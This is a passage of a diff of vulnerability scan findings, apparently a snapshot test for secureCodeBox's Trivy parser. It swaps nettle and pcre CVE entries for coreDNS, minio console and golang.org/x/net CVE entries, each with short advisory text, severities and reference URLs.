"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", + "https://access.redhat.com/security/cve/CVE-2022-2837", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "https://www.cve.org/CVERecord?id=CVE-2022-2837", ], }, "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", + "name": "DNS Redirection of Top-Level Domains", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2022-2837", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-2837", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", }, { "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.28.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-33955", + "installedVersion": "v0.20.0", + "packageName": "github.com/minio/console", + "references": [ + "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "https://github.com/minio/console/releases/tag/v0.28.0", + "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + ], + }, + "category": "Vulnerability", + "description": +"Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2023-33955", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", + "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", + "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", + "value": "https://github.com/minio/console/releases/tag/v0.28.0", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", - }, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-14155", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", - "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", - "https://access.redhat.com/security/cve/CVE-2020-14155", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2020-14155.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", - "https://security.netapp.com/advisory/ntap-20221028-0010/", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2020-14155", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.pcre.org/original/changelog.txt", - ], - }, - "category": "Vulnerability", - "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: Integer overflow when parsing callout numeric arguments", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-14155", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", - "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", - ], - }, - "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - "http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://go.dev/cl/447396", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://go.dev/issue/56352", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": 